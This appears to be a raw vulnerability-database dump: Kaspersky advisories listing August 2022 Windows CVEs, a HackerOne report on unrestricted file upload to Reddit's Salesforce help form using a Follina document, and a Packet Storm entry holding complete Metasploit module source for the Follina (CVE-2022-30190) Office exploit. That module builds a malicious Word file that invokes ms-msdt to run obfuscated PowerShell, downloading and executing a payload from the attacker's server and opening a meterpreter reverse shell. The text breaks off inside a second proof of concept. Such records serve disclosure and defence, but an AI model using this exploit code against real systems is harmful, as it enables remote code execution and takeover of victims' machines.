\n[CVE-2022-34707](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34707>) \n[CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>) \n[CVE-2022-35820](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35820>) \n[CVE-2022-30194](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30194>) \n[CVE-2022-35744](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35744>) \n[CVE-2022-34706](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34706>) \n[CVE-2022-34714](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34714>) \n[CVE-2022-30133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30133>) \n[CVE-2022-35758](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35758>) \n[CVE-2022-35767](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35767>) \n[CVE-2022-35769](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35769>) \n[CVE-2022-35795](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35795>) \n[CVE-2022-35760](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35760>) \n[CVE-2022-35768](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35768>) \n[CVE-2022-35752](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35752>) \n[CVE-2022-35793](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35793>) \n[CVE-2022-35747](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35747>) \n[CVE-2022-35743](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35743>) \n[CVE-2022-35756](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35756>) \n[CVE-2022-34702](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34702>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB 
list*:\n[5016686](<http://support.microsoft.com/kb/5016686>) \n[5016669](<http://support.microsoft.com/kb/5016669>) \n[5016679](<http://support.microsoft.com/kb/5016679>) \n[5016676](<http://support.microsoft.com/kb/5016676>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "kaspersky", "title": "KLA12603 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30194", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35747", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35756", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35793", "CVE-2022-35795", "CVE-2022-35820"], "modified": "2022-08-10T00:00:00", "id": "KLA12603", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12603/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-27T08:08:51", "description": "### *Detect date*:\n08/09/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to cause denial of service, gain privileges, bypass security restrictions, execute arbitrary code, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. 
Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 8.1 for x64-based systems \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2022 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows Server 2022 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 11 for ARM64-based Systems \nWindows Server 2016 \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 21H2 for 32-bit Systems \nWindows Server 2019 \nWindows 10 for x64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-35759](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35759>) \n[CVE-2022-34705](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34705>) \n[CVE-2022-35765](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35765>) 
\n[CVE-2022-34303](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34303>) \n[CVE-2022-35763](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35763>) \n[CVE-2022-34703](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34703>) \n[CVE-2022-35751](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35751>) \n[CVE-2022-34707](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34707>) \n[CVE-2022-30194](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30194>) \n[CVE-2022-35771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35771>) \n[CVE-2022-35744](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35744>) \n[CVE-2022-34714](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34714>) \n[CVE-2022-34301](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34301>) \n[CVE-2022-35794](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35794>) \n[CVE-2022-35766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35766>) \n[CVE-2022-34709](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34709>) \n[CVE-2022-34704](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34704>) \n[CVE-2022-35767](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35767>) \n[CVE-2022-35769](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35769>) \n[CVE-2022-35804](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35804>) \n[CVE-2022-30197](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30197>) \n[CVE-2022-35795](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35795>) \n[CVE-2022-35760](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35760>) \n[CVE-2022-35793](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35793>) 
\n[CVE-2022-35747](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35747>) \n[CVE-2022-35743](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35743>) \n[CVE-2022-35764](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35764>) \n[CVE-2022-30144](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30144>) \n[CVE-2022-35761](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35761>) \n[CVE-2022-35762](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35762>) \n[CVE-2022-34702](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34702>) \n[CVE-2022-35757](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35757>) \n[CVE-2022-34690](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34690>) \n[CVE-2022-35745](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35745>) \n[CVE-2022-35750](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35750>) \n[CVE-2022-34708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34708>) \n[CVE-2022-35792](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35792>) \n[CVE-2022-35753](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35753>) \n[CVE-2022-34712](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34712>) \n[CVE-2022-34701](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34701>) \n[CVE-2022-34691](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34691>) \n[CVE-2022-34302](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34302>) \n[CVE-2022-35746](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35746>) \n[CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>) \n[CVE-2022-35820](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35820>) 
\n[CVE-2022-34696](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34696>) \n[CVE-2022-33670](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33670>) \n[CVE-2022-34706](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34706>) \n[CVE-2022-34699](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34699>) \n[CVE-2022-35754](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35754>) \n[CVE-2022-35748](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35748>) \n[CVE-2022-30133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30133>) \n[CVE-2022-35758](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35758>) \n[CVE-2022-35755](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35755>) \n[CVE-2022-35797](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35797>) \n[CVE-2022-35749](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35749>) \n[CVE-2022-35768](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35768>) \n[CVE-2022-35752](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35752>) \n[CVE-2022-34715](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715>) \n[CVE-2022-34710](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34710>) \n[CVE-2022-35756](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35756>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5016627](<http://support.microsoft.com/kb/5016627>) \n[5016672](<http://support.microsoft.com/kb/5016672>) \n[5016622](<http://support.microsoft.com/kb/5016622>) \n[5016683](<http://support.microsoft.com/kb/5016683>) \n[5016639](<http://support.microsoft.com/kb/5016639>) \n[5016616](<http://support.microsoft.com/kb/5016616>) \n[5016623](<http://support.microsoft.com/kb/5016623>) 
\n[5016684](<http://support.microsoft.com/kb/5016684>) \n[5016681](<http://support.microsoft.com/kb/5016681>) \n[5012170](<http://support.microsoft.com/kb/5012170>) \n[5016629](<http://support.microsoft.com/kb/5016629>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "kaspersky", "title": "KLA12602 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-30197", "CVE-2022-33670", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34705", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34712", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-34715", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35757", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35762", "CVE-2022-35763", "CVE-2022-35764", "CVE-2022-35765", "CVE-2022-35766", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35792", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35795", "CVE-2022-35797", "CVE-2022-35804", "CVE-2022-35820"], "modified": "2022-09-27T00:00:00", "id": 
"KLA12602", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12602/", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2023-02-03T02:24:51", "bounty": 100.0, "description": "## Summary:\nReddit.secure.force.com is Reddit SalesForce instance. Attacker is able to send attachments of disallowed filetypes to this server. The attacker is able to send malicious documents such as CVE-2022-30190 Follina to the victim.\n\n## Impact:\nAttacker can send malicious files to whoever handles the form behind https://reddit.secure.force.com/adhelp\n\n## Steps To Reproduce:\n 1. Go to https://reddit.secure.force.com/adhelp \n 2. Notice that the specified allowed filetype is: jpg jpeg gif png pdf as you can see with the image below: \n\n{F1780944}\n\n 3. If you try dragging and dropping a docx file to that box, there is a Javascript which forbids such action. But if you used the \"Click to browse\" option you can start uploading the file.\n\n{F1780957}\n\n4. The file upload request: \n\n```http\nPOST /adhelp/apexremote HTTP/1.1\nHost: reddit.secure.force.com\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://reddit.secure.force.com/adhelp/\nX-User-Agent: Visualforce-Remoting\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 15301\nOrigin: https://reddit.secure.force.com\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"action\":\"AdvertisingHelpController\",\"method\":\"uploadFile\",\"data\":[\"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\",\"\",\"Dummy 
Data.docx\",\"5005c000017FCu8AAG\",\"118.70.7.113\"],\"type\":\"rpc\",\"tid\":3,\"ctx\":{\"csrf\":\"VmpFPSxNakF5TWkwd05pMHlNMVF3T0Rvek1qb3lOQzQ0TURCYSxPeVQ1SlZBcnRoajJZQlJFS1c3QVlvLE5HVXhPRGN6\",\"vid\":\"0661J000003FS4V\",\"ns\":\"\",\"ver\":41}}\n```\n\nHere the data parameter contains the base64 encoded version of my clickme.docx file, which is based on the critical Follina vulnerability {F1780963}. This vulnerability can become a [zero click exploit](https://innovatecybersecurity.com/security-threat-advisory/follina-zero-day-allows-zero-click-rce-from-office-docs/).\n\n5. Response returns 200, indicated that there is no existing server side check for filetype and the file was uploaded successfully: \n```http\nHTTP/1.1 200 OK\nDate: Mon, 20 Jun 2022 08:41:53 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: origin-when-cross-origin\nCache-Control: no-cache,must-revalidate,max-age=0,no-store,private\nContent-Type: application/json;charset=UTF-8\nX-Powered-By: Salesforce.com Visualforce\nVary: Accept-Encoding\nConnection: close\nContent-Length: 142\n\n[{\"statusCode\":200,\"type\":\"rpc\",\"tid\":3,\"ref\":false,\"action\":\"AdvertisingHelpController\",\"method\":\"uploadFile\",\"result\":\"00P5c00001leROKEA2\"}]\n```\n\n## Impact\n\nAttacker can send malicious files to whoever handles the form behind https://reddit.secure.force.com/adhelp", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-20T09:10:53", "type": "hackerone", "title": "Reddit: Unrestricted File Upload on 
reddit.secure.force.com", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-30T14:56:49", "id": "H1:1606957", "href": "https://hackerone.com/reports/1606957", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-06-07T16:53:04", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "packetstorm", "title": "Microsoft Office Word MSDTJS Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T00:00:00", "id": "PACKETSTORM:167438", 
"href": "https://packetstormsecurity.com/files/167438/Microsoft-Office-Word-MSDTJS-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Office Word MSDTJS', \n'Description' => %q{ \nThis module generates a malicious Microsoft Word document that when loaded, will leverage the remote template \nfeature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code. \n}, \n'References' => [ \n['CVE', '2022-30190'], \n['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'], \n['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19'], \n['URL', 'https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/'], \n['URL', 'https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e'], \n['URL', 'https://twitter.com/GossiTheDog/status/1531608245009367040'], \n['URL', 'https://github.com/JMousqueton/PoC-CVE-2022-30190'] \n], \n'Author' => [ \n'nao sec', # Original disclosure. 
\n'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop CyberSecurity \n], \n'DisclosureDate' => '2022-05-29', \n'License' => MSF_LICENSE, \n'Privileged' => false, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Payload' => { \n'DisableNops' => true \n}, \n'DefaultOptions' => { \n'DisablePayloadHandler' => false, \n'FILENAME' => 'msf.docx', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'SRVHOST' => Rex::Socket.source_address('1.2.3.4') \n}, \n'Targets' => [ \n[ 'Microsoft Office Word', {} ] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['Follina'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [UNRELIABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']), \nOptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true]) \n]) \nend \n \ndef get_file_in_docx(fname) \ni = @docx.find_index { |item| item[:fname] == fname } \n \nunless i \nfail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\") \nend \n \n@docx.fetch(i)[:data] \nend \n \ndef get_template_path \ndatastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx') \nend \n \ndef generate_html \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1\" \n \ndummy = '' \n(1..random_int(61, 100)).each do |_n| \ndummy += '//' + rand_text_alpha(100) + \"\\n\" \nend \n \ncmd = Rex::Text.encode_base64(\"IEX(New-Object Net.WebClient).downloadString('#{uri}')\") \n \njs_content = \"window.location.href = \\\"ms-msdt:/id PCWDiagnostic /skip force /param \\\\\\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed 
IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'#{cmd}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\\\\\\"\\\";\" \nif datastore['OBFUSCATE'] \nprint_status('Obfuscate JavaScript content') \n \njs_content = Rex::Exploitation::JSObfu.new js_content \njs_content = js_content.obfuscate(memory_sensitive: false) \nend \n \nhtml = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>' \nhtml += \"\\n#{dummy}\\n#{js_content}\\n\" \nhtml += '</script></body></html>' \n \nhtml \nend \n \ndef inject_docx \ndocument_xml = get_file_in_docx('word/document.xml') \nunless document_xml \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml') \nend \n \ndocument_xml_rels = get_file_in_docx('word/_rels/document.xml.rels') \nunless document_xml_rels \nfail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels') \nend \n \nuri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\" \n@docx.each do |entry| \ncase entry[:fname] \nwhen 'word/_rels/document.xml.rels' \nentry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"#{uri}!\") \nend \nend \nend \n \ndef normalize_uri(*strs) \nnew_str = strs * '/' \n \nnew_str = new_str.gsub!('//', '/') while new_str.index('//') \n \n# makes sure there's a starting slash \nunless new_str.start_with?('/') \nnew_str = '/' + new_str \nend \n \nnew_str \nend \n \ndef on_request_uri(cli, request) \nheader_html = { \n'Access-Control-Allow-Origin' => '*', \n'Access-Control-Allow-Methods' => 'GET, POST', \n'Cache-Control' => 'no-store, no-cache, must-revalidate', \n'Content-Type' => 'text/html; 
charset=UTF-8' \n} \n \nif request.method.eql? 'HEAD' \nsend_response(cli, '', header_html) \nelsif request.method.eql? 'OPTIONS' \nresponse = create_response(501, 'Unsupported Method') \nresponse['Content-Type'] = 'text/html' \nresponse.body = '' \n \ncli.send_response(response) \nelsif request.raw_uri.to_s.end_with? '.html' \nprint_status('Sending HTML Payload') \n \nsend_response_html(cli, generate_html, header_html) \nelsif request.raw_uri.to_s.end_with? '.ps1' \nprint_status('Sending PowerShell Payload') \n \nsend_response(cli, @payload_data, header_html) \nend \nend \n \ndef pack_docx \n@docx.each do |entry| \nif entry[:data].is_a?(Nokogiri::XML::Document) \nentry[:data] = entry[:data].to_s \nend \nend \n \nMsf::Util::EXE.to_zip(@docx) \nend \n \ndef primer \nprint_status('Generating a malicious docx file') \n \n@proto = (datastore['SSL'] ? 'https' : 'http') \n \ntemplate_path = get_template_path \nunless File.extname(template_path).downcase.end_with?('.docx') \nfail_with(Failure::BadConfig, 'Template is not a docx file!') \nend \n \nprint_status(\"Using template '#{template_path}'\") \n@docx = unpack_docx(template_path) \n \nprint_status('Injecting payload in docx document') \ninject_docx \n \nprint_status(\"Finalizing docx '#{datastore['FILENAME']}'\") \nfile_create(pack_docx) \n \n@payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true) \n \nsuper \nend \n \ndef random_int(min, max) \nrand(max - min) + min \nend \n \ndef unpack_docx(template_path) \ndocument = [] \n \nZip::File.open(template_path) do |entries| \nentries.each do |entry| \nif entry.name.downcase.end_with?('.xml', '.rels') \ncontent = Nokogiri::XML(entry.get_input_stream.read) if entry.file? \nelsif entry.file? 
\ncontent = entry.get_input_stream.read \nend \n \nvprint_status(\"Parsing item from template: #{entry.name}\") \n \ndocument << { fname: entry.name, data: content } \nend \nend \n \ndocument \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167438/word_msdtjs_rce.rb.txt"}, {"lastseen": "2022-05-31T17:41:58", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T00:00:00", "type": "packetstorm", "title": "Microsoft Office MSDT Follina Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44444", "CVE-2022-30190"], "modified": "2022-05-31T00:00:00", "id": "PACKETSTORM:167317", "href": "https://packetstormsecurity.com/files/167317/Microsoft-Office-MSDT-Follina-Proof-Of-Concept.html", "sourceData": "`# POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina \n \n> Info : [New Microsoft Office zero-day used in attacks to execute 
